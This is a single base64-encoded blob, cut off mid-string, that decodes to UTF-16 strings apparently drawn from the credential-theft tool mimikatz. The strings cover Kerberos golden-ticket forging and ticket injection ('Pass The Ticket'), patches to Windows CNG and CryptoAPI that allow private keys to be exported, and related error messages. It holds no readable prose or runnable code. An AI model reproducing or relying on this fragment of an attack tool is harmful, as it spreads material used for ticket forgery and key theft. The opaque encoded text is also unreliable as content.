ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFMAdQBiAG0AaQB0AFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAAAFQAaQBjAGsAZQB0ACgAcwApACAAcAB1AHIAZwBlACAAZgBvAHIAIABjAHUAcgByAGUAbgB0ACAAcwBlAHMAcwBpAG8AbgAgAGkAcwAgAE8ASwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdQByAGcAZQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBQAHUAcgBnAGUAVABpAGMAawBlAHQAQwBhAGMAaABlAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdQByAGcAZQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBQAHUAcgBnAGUAVABpAGMAawBlAHQAQwBhAGMAaABlAE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAABLAGUAcgBiAGUAcgBvAHMAIABUAEcAVAAgAG8AZgAgAGMAdQByAHIAZQBuAHQAIABzAGUAcwBzAGkAbwBuACAAOgAgAAAAAAAKAAoACQAqACoAIABTAGUAcwBzAGkAbwBuACAAawBlAHkAIABpAHMAIABOAFUATABMACEAIABJAHQAIABtAGUAYQBuAHMAIABhAGwAbABvAHcAdABnAHQAcwBlAHMAcwBpAG8AbgBrAGUAeQAgAGkAcwAgAG4AbwB0ACAAcwBlAHQAIAB0AG8AIAAxACAAKgAqAAoAAAAAAG4AbwAgAHQAaQBjAGsAZQB0ACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwB0AGcAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AdABnAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAABlAHgAcABvAHIAdAAAAAAACgBbACUAMAA4AHgAXQAgAC0AIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAAAAKACAAIAAgAFMAdABhAHIAdAAvAEUAbgBkAC8ATQBhAHgAUgBlAG4AZQB3ADoAIAAAAAAAIAA7ACAAAAAKACAAIAAgAFMAZQByAHYAZQByACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAAAAAAKACAAIAAgAEMAbABpAGUAbgB0ACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAoAIAAgACAARgBsAGEAZwBzACAAJQAwADgAeAAgACAAIAAgADoAIAAAAAAAawBpAHIAYgBpAAAACgAgACAAIAAqACAAUwBhAHYAZQBkACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAOgAgACUAcwAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBFAG4AYwBvAGQAZQBkAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBRAHUAZQByAHkAVABpAGMAawBlAHQAQwBhAGMAaABlAEUAeAAyAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AbABpAHMAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBRAHUAZQByAHkAVABpAGMAawBlAHQAQwBhAGMAaABlAEUAeAAyAE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAAAlAHUALQAlADAAOAB4AC0AJQB3AFoAQAAlAHcAWgAtACUAdwBaAC4AJQBzAAAAAAB0AGkAYwBrAGUAdAAuAGsAaQByAGIAaQAAAAAAdABpAGMAawBlAHQAAAAAAGEAZABtAGkAbgAAAGQAbwBtAGEAaQBuAAAAAABzAGkAZAAAAGQAZQBzAAAAcgBjADQAAABrAHIAYgB0AGcAdAAAAAAAYQBlAHMAMQAyADgAAAAAAGEAZQBzADIANQA2AAAAAAB0AGEAcgBnAGUAdAAAAAAAaQBkAAAAAABnAHIAbwB1AHAAcwAAAAAAMAAAAHMAdABhAHIAdABvAGYAZgBzAGUAdAAAADUAMgA1ADYAMAAwADAAAABlAG4AZABpAG4AAAByAGUAbgBlAHcAbQBhAHgAAAAAAFUAcwBlAHIAIAAgACAAIAAgACAAOgAgACUAcwAKAEQAbwBtAGEAaQBuACAAIAAgACAAOgAgACUAcwAKAFMASQBEACAAIAAgACAAIAAgACAAOgAgACUAcwAKAFUAcwBlAHIAIABJAGQAIAAgACAAOgAgACUAdQAKAAAAAABHAHIAbwB1AHAAcwAgAEkAZAAgADoAIAAqAAAAJQB1ACAAAAAKAFMAZQByAHYAaQBjAGUASwBlAHkAOgAgAAAAIAAtACAAJQBzAAoAAAAAAFMAZQByAHYAaQBjAGUAIAAgACAAOgAgACUAcwAKAAAAVABhAHIAZwBlAHQAIAAgACAAIAA6ACAAJQBzAAoAAABMAGkAZgBlAHQAaQBtAGUAIAAgADoAIAAAAAAAKgAqACAAUABhAHMAcwAgAFQAaABlACAAVABpAGMAawBlAHQAIAAqACoAAAAtAD4AIABUAGkAYwBrAGUAdAAgADoAIAAlAHMACgAKAAAAAAAKAEcAbwBsAGQAZQBuACAAdABpAGMAawBlAHQAIABmAG8AcgAgACcAJQBzACAAQAAgACUAcwAnACAAcwB1AGMAYwBlAHMAcwBmAHUAbABsAHkAIABzAHUAYgBtAGkAdAB0AGUAZAAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4ACgAAAAAACgBGAGkAbgBhAGwAIABUAGkAYwBrAGUAdAAgAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAIAAhAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAAoAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAQwByAGUAZAAgAGUAcgByAG8AcgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAdABnAHQAIABrAGUAeQAgAHMAaQB6AGUAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAlAHUAIAAoACUAdQAgAGIAeQB0AGUAcwApACAAZgBvAHIAIAAlAHMACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAAVQBuAGEAYgBsAGUAIAB0AG8AIABsAG8AYwBhAHQAZQAgAEMAcgB5AHAAdABvAFMAeQBzAHQAZQBtACAAZgBvAHIAIABFAFQAWQBQAEUAIAAlAHUAIAAoAGUAcgByAG8AcgAgADAAeAAlADAAOAB4ACkAIAAtACAAQQBFAFMAIABvAG4AbAB5ACAAYQB2AGEAaQBsAGEAYgBsAGUAIABvAG4AIABOAFQANgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAGsAcgBiAHQAZwB0ACAAawBlAHkAIABhAHIAZwB1AG0AZQBuAHQAIAAoAC8AcgBjADQAIABvAHIAIAAvAGEAZQBzADEAMgA4ACAAbwByACAALwBhAGUAcwAyADUANgApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAFMASQBEACAAcwBlAGUAbQBzACAAaQBuAHYAYQBsAGkAZAAgAC0AIABDAG8AbgB2AGUAcgB0AFMAdAByAGkAbgBnAFMAaQBkAFQAbwBTAGkAZAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABTAEkARAAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAZABvAG0AYQBpAG4AIABhAHIAZwB1AG0AZQBuAHQACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAHUAcwBlAHIAIABhAHIAZwB1AG0AZQBuAHQACgAAACAAKgAgAFAAQQBDACAAZwBlAG4AZQByAGEAdABlAGQACgAAACAAKgAgAFAAQQBDACAAcwBpAGcAbgBlAGQACgAAAAAAIAAqACAARQBuAGMAVABpAGMAawBlAHQAUABhAHIAdAAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAgACoAIABFAG4AYwBUAGkAYwBrAGUAdABQAGEAcgB0ACAAZQBuAGMAcgB5AHAAdABlAGQACgAAACAAKgAgAEsAcgBiAEMAcgBlAGQAIABnAGUAbgBlAHIAYQB0AGUAZAAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AXwBkAGEAdABhACAAOwAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZQBuAGMAcgB5AHAAdAAgACUAMAA4AHgACgAAAHAAYQBzAHMAdwBvAHIAZAAAAAAAYwBvAHUAbgB0AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AaABhAHMAaAAgADsAIABIAGEAcwBoAFAAYQBzAHMAdwBvAHIAZAAgADoAIAAlADAAOAB4AAoAAABYAC0AQwBBAEMASABFAEMATwBOAEYAOgAAAAAACgBQAHIAaQBuAGMAaQBwAGEAbAAgADoAIAAAAAoACgBEAGEAdABhACAAJQB1AAAACgAJACAAIAAgACoAIABJAG4AagBlAGMAdABpAG4AZwAgAHQAaQBjAGsAZQB0ACAAOgAgAAAAAAAKAAkAIAAgACAAKgAgAFMAYQB2AGUAZAAgAHQAbwAgAGYAaQBsAGUAIAAlAHMAIAAhAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AYwBjAGEAYwBoAGUAXwBlAG4AdQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AZgBpAGwAZQBfAHcAcgBpAHQAZQBEAGEAdABhACAAKAAwAHgAJQAwADgAeAApAAoAAAAKAAkAKgAgACUAdwBaACAAZQBuAHQAcgB5AD8AIAAqAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAYwBjAGEAYwBoAGUAIAB2AGUAcgBzAGkAbwBuACAAIQA9ACAAMAB4ADAANQAwADQACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGMAYwBhAGMAaABlAF8AZQBuAHUAbQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBjAGMAYQBjAGgAZQBfAGUAbgB1AG0AIAA7ACAAQQB0ACAAbABlAGEAcwB0ACAAbwBuAGUAIABmAGkAbABlAG4AYQBtAGUAIABpAHMAIABuAGUAZQBkAGUAZAAKAAAAAAAlAHUALQAlADAAOAB4AC4AJQBzAAAAAAByAGUAcwBlAHIAdgBlAGQAAAAAAGYAbwByAHcAYQByAGQAYQBiAGwAZQAAAGYAbwByAHcAYQByAGQAZQBkAAAAcAByAG8AeABpAGEAYgBsAGUAAABwAHIAbwB4AHkAAABtAGEAeQBfAHAAbwBzAHQAZABhAHQAZQAAAAAAcABvAHMAdABkAGEAdABlAGQAAABpAG4AdgBhAGwAaQBkAAAAcgBlAG4AZQB3AGEAYgBsAGUAAABpAG4AaQB0AGkAYQBsAAAAcAByAGUAXwBhAHUAdABoAGUAbgB0AAAAaAB3AF8AYQB1AHQAaABlAG4AdAAAAAAAbwBrAF8AYQBzAF8AZABlAGwAZQBnAGEAdABlAAAAAAA/AAAAbgBhAG0AZQBfAGMAYQBuAG8AbgBpAGMAYQBsAGkAegBlAAAACgAJACAAIAAgAFMAdABhAHIAdAAvAEUAbgBkAC8ATQBhAHgAUgBlAG4AZQB3ADoAIAAAAAoACQAgACAAIABTAGUAcgB2AGkAYwBlACAATgBhAG0AZQAgAAAAAAAKAAkAIAAgACAAVABhAHIAZwBlAHQAIABOAGEAbQBlACAAIAAAAAAACgAJACAAIAAgAEMAbABpAGUAbgB0ACAATgBhAG0AZQAgACAAAAAAACAAKAAgACUAdwBaACAAKQAAAAAACgAJACAAIAAgAEYAbABhAGcAcwAgACUAMAA4AHgAIAAgACAAIAA6ACAAAAAAAAAACgAJACAAIAAgAFMAZQBzAHMAaQBvAG4AIABLAGUAeQAgACAAIAAgACAAIAAgADoAIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAAAAAAAoACQAgACAAIAAgACAAAAAAAAAACgAJACAAIAAgAFQAaQBjAGsAZQB0ACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAIAA7ACAAawB2AG4AbwAgAD0AIAAlAHUAAAAAAAkAWwAuAC4ALgBdAAAAAAAlAHMAIAA7ACAAAAAoACUAMAAyAGgAdQApACAAOgAgAAAAAAAlAHcAWgAgADsAIAAAAAAAKAAtAC0AKQAgADoAIAAAAEAAIAAlAHcAWgAAAG4AdQBsAGwAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAAAGQAZQBzAF8AcABsAGEAaQBuACAAIAAgACAAIAAgACAAIAAAAGQAZQBzAF8AYwBiAGMAXwBjAHIAYwAgACAAIAAgACAAIAAAAGQAZQBzAF8AYwBiAGMAXwBtAGQANAAgACAAIAAgACAAIAAAAGQAZQBzAF8AYwBiAGMAXwBtAGQANQAgACAAIAAgACAAIAAAAGQAZQBzAF8AYwBiAGMAXwBtAGQANQBfAG4AdAAgACAAIAAAAHIAYwA0AF8AcABsAGEAaQBuACAAIAAgACAAIAAgACAAIAAAAHIAYwA0AF8AcABsAGEAaQBuADIAIAAgACAAIAAgACAAIAAAAHIAYwA0AF8AcABsAGEAaQBuAF8AZQB4AHAAIAAgACAAIAAAAHIAYwA0AF8AbABtACAAIAAgACAAIAAgACAAIAAgACAAIAAAAHIAYwA0AF8AbQBkADQAIAAgACAAIAAgACAAIAAgACAAIAAAAHIAYwA0AF8AcwBoAGEAIAAgACAAIAAgACAAIAAgACAAIAAAAHIAYwA0AF8AaABtAGEAYwBfAG4AdAAgACAAIAAgACAAIAAAAHIAYwA0AF8AaABtAGEAYwBfAG4AdABfAGUAeABwACAAIAAAAHIAYwA0AF8AcABsAGEAaQBuAF8AbwBsAGQAIAAgACAAIAAAAHIAYwA0AF8AcABsAGEAaQBuAF8AbwBsAGQAXwBlAHgAcAAAAHIAYwA0AF8AaABtAGEAYwBfAG8AbABkACAAIAAgACAAIAAAAHIAYwA0AF8AaABtAGEAYwBfAG8AbABkAF8AZQB4AHAAIAAAAGEAZQBzADEAMgA4AF8AaABtAGEAYwBfAHAAbABhAGkAbgAAAGEAZQBzADIANQA2AF8AaABtAGEAYwBfAHAAbABhAGkAbgAAAGEAZQBzADEAMgA4AF8AaABtAGEAYwAgACAAIAAgACAAIAAAAGEAZQBzADIANQA2AF8AaABtAGEAYwAgACAAIAAgACAAIAAAAHUAbgBrAG4AbwB3ACAAIAAgACAAIAAgACAAIAAgACAAIAAAAFAAUgBPAFYAXwBSAFMAQQBfAEEARQBTAAAAAABQAFIATwBWAF8AUgBFAFAATABBAEMARQBfAE8AVwBGAAAAAABQAFIATwBWAF8ASQBOAFQARQBMAF8AUwBFAEMAAAAAAFAAUgBPAFYAXwBSAE4ARwAAAAAAUABSAE8AVgBfAFMAUABZAFIAVQBTAF8ATABZAE4ASwBTAAAAUABSAE8AVgBfAEQASABfAFMAQwBIAEEATgBOAEUATAAAAAAAUABSAE8AVgBfAEUAQwBfAEUAQwBOAFIAQQBfAEYAVQBMAEwAAAAAAFAAUgBPAFYAXwBFAEMAXwBFAEMARABTAEEAXwBGAFUATABMAAAAAABQAFIATwBWAF8ARQBDAF8ARQBDAE4AUgBBAF8AUwBJAEcAAABQAFIATwBWAF8ARQBDAF8ARQBDAEQAUwBBAF8AUwBJAEcAAABQAFIATwBWAF8ARABTAFMAXwBEAEgAAABQAFIATwBWAF8AUgBTAEEAXwBTAEMASABBAE4ATgBFAEwAAABQAFIATwBWAF8AUwBTAEwAAAAAAFAAUgBPAFYAXwBNAFMAXwBFAFgAQwBIAEEATgBHAEUAAAAAAFAAUgBPAFYAXwBGAE8AUgBUAEUAWgBaAEEAAABQAFIATwBWAF8ARABTAFMAAAAAAFAAUgBPAFYAXwBSAFMAQQBfAFMASQBHAAAAAABQAFIATwBWAF8AUgBTAEEAXwBGAFUATABMAAAATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABSAFMAQQAgAGEAbgBkACAAQQBFAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAATQBTAF8ARQBOAEgAXwBSAFMAQQBfAEEARQBTAF8AUABSAE8AVgAAAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAbgBoAGEAbgBjAGUAZAAgAFIAUwBBACAAYQBuAGQAIABBAEUAUwAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAIAAoAFAAcgBvAHQAbwB0AHkAcABlACkAAABNAFMAXwBFAE4ASABfAFIAUwBBAF8AQQBFAFMAXwBQAFIATwBWAF8AWABQAAAAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAAUwBtAGEAcgB0ACAAQwBhAHIAZAAgAEMAcgB5AHAAdABvACAAUAByAG8AdgBpAGQAZQByAAAATQBTAF8AUwBDAEEAUgBEAF8AUABSAE8AVgAAAE0AaQBjAHIAbwBzAG8AZgB0ACAARABIACAAUwBDAGgAYQBuAG4AZQBsACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAATQBTAF8ARABFAEYAXwBEAEgAXwBTAEMASABBAE4ATgBFAEwAXwBQAFIATwBWAAAAAAAAAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBuAGgAYQBuAGMAZQBkACAARABTAFMAIABhAG4AZAAgAEQAaQBmAGYAaQBlAC0ASABlAGwAbABtAGEAbgAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAE0AUwBfAEUATgBIAF8ARABTAFMAXwBEAEgAXwBQAFIATwBWAAAAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAARABTAFMAIABhAG4AZAAgAEQAaQBmAGYAaQBlAC0ASABlAGwAbABtAGEAbgAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAAAAAE0AUwBfAEQARQBGAF8ARABTAFMAXwBEAEgAXwBQAFIATwBWAAAAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAARABTAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAATQBTAF8ARABFAEYAXwBEAFMAUwBfAFAAUgBPAFYAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABSAFMAQQAgAFMAQwBoAGEAbgBuAGUAbAAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAAABNAFMAXwBEAEUARgBfAFIAUwBBAF8AUwBDAEgAQQBOAE4ARQBMAF8AUABSAE8AVgAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABSAFMAQQAgAFMAaQBnAG4AYQB0AHUAcgBlACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAAAAAATQBTAF8ARABFAEYAXwBSAFMAQQBfAFMASQBHAF8AUABSAE8AVgAAAE0AaQBjAHIAbwBzAG8AZgB0ACAAUwB0AHIAbwBuAGcAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByAAAATQBTAF8AUwBUAFIATwBOAEcAXwBQAFIATwBWAAAAAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAbgBoAGEAbgBjAGUAZAAgAEMAcgB5AHAAdABvAGcAcgBhAHAAaABpAGMAIABQAHIAbwB2AGkAZABlAHIAIAB2ADEALgAwAAAAAABNAFMAXwBFAE4ASABBAE4AQwBFAEQAXwBQAFIATwBWAAAAAAAAAAAATQBpAGMAcgBvAHMAbwBmAHQAIABCAGEAcwBlACAAQwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAFAAcgBvAHYAaQBkAGUAcgAgAHYAMQAuADAAAAAAAE0AUwBfAEQARQBGAF8AUABSAE8AVgAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAFMARQBSAFYASQBDAEUAUwAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AVQBTAEUAUgBTAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AQwBVAFIAUgBFAE4AVABfAFMARQBSAFYASQBDAEUAAAAAAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8ATABPAEMAQQBMAF8ATQBBAEMASABJAE4ARQBfAEUATgBUAEUAUgBQAFIASQBTAEUAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXwBHAFIATwBVAFAAXwBQAE8ATABJAEMAWQAAAAAAAAAAAEMARQBSAFQAXwBTAFkAUwBUAEUATQBfAFMAVABPAFIARQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAAABDAEUAUgBUAF8AUwBZAFMAVABFAE0AXwBTAFQATwBSAEUAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBfAEcAUgBPAFUAUABfAFAATwBMAEkAQwBZAAAAQwBFAFIAVABfAFMAWQBTAFQARQBNAF8AUwBUAE8AUgBFAF8AQwBVAFIAUgBFAE4AVABfAFUAUwBFAFIAAAAAAFsAZQB4AHAAZQByAGkAbQBlAG4AdABhAGwAXQAgAFAAYQB0AGMAaAAgAEMATgBHACAAcwBlAHIAdgBpAGMAZQAgAGYAbwByACAAZQBhAHMAeQAgAGUAeABwAG8AcgB0AAAAAABjAG4AZwAAAAAAAABbAGUAeABwAGUAcgBpAG0AZQBuAHQAYQBsAF0AIABQAGEAdABjAGgAIABDAHIAeQBwAHQAbwBBAFAASQAgAGwAYQB5AGUAcgAgAGYAbwByACAAZQBhAHMAeQAgAGUAeABwAG8AcgB0AAAAAABjAGEAcABpAAAAAABMAGkAcwB0ACAAKABvAHIAIABlAHgAcABvAHIAdAApACAAawBlAHkAcwAgAGMAbwBuAHQAYQBpAG4AZQByAHMAAAAAAGsAZQB5AHMAAAAAAEwAaQBzAHQAIAAoAG8AcgAgAGUAeABwAG8AcgB0ACkAIABjAGUAcgB0AGkAZgBpAGMAYQB0AGUAcwAAAGMAZQByAHQAaQBmAGkAYwBhAHQAZQBzAAAAAABMAGkAcwB0ACAAYwByAHkAcAB0AG8AZwByAGEAcABoAGkAYwAgAHMAdABvAHIAZQBzAAAAcwB0AG8AcgBlAHMAAAAAAEwAaQBzAHQAIABjAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAcAByAG8AdgBpAGQAZQByAHMAAAAAAHAAcgBvAHYAaQBkAGUAcgBzAAAAQwByAHkAcAB0AG8AIABNAG8AZAB1AGwAZQAAAGMAcgB5AHAAdABvAAAAAAByAHMAYQBlAG4AaAAAAAAAQ1BFeHBvcnRLZXkAbgBjAHIAeQBwAHQAAAAAAE5DcnlwdE9wZW5TdG9yYWdlUHJvdmlkZXIAAABOQ3J5cHRFbnVtS2V5cwAATkNyeXB0T3BlbktleQAAAE5DcnlwdEV4cG9ydEtleQBOQ3J5cHRHZXRQcm9wZXJ0eQAAAE5DcnlwdEZyZWVCdWZmZXIAAAAATkNyeXB0RnJlZU9iamVjdAAAAABCQ3J5cHRFbnVtUmVnaXN0ZXJlZFByb3ZpZGVycwAAAEJDcnlwdEZyZWVCdWZmZXIAAAAACgBDAHIAeQBwAHQAbwBBAFAASQAgAHAAcgBvAHYAaQBkAGUAcgBzACAAOgAKAAAAJQAyAHUALgAgACUAcwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABDAHIAeQBwAHQARQBuAHUAbQBQAHIAbwB2AGkAZABlAHIAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAKAEMATgBHACAAcAByAG8AdgBpAGQAZQByAHMAIAA6AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGwAXwBwAHIAbwB2AGkAZABlAHIAcwAgADsAIABCAEMAcgB5AHAAdABFAG4AdQBtAFIAZQBnAGkAcwB0AGUAcgBlAGQAUAByAG8AdgBpAGQAZQByAHMAIAAoADAAeAAlADAAOAB4ACkACgAAAHMAeQBzAHQAZQBtAHMAdABvAHIAZQAAAAAAAABBAHMAawBpAG4AZwAgAGYAbwByACAAUwB5AHMAdABlAG0AIABTAHQAbwByAGUAIAAnACUAcwAnACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBsAF8AcwB0AG8AcgBlAHMAIAA7ACAAQwBlAHIAdABFAG4AdQBtAFMAeQBzAHQAZQBtAFMAdABvAHIAZQAgACgAMAB4ACUAMAA4AHg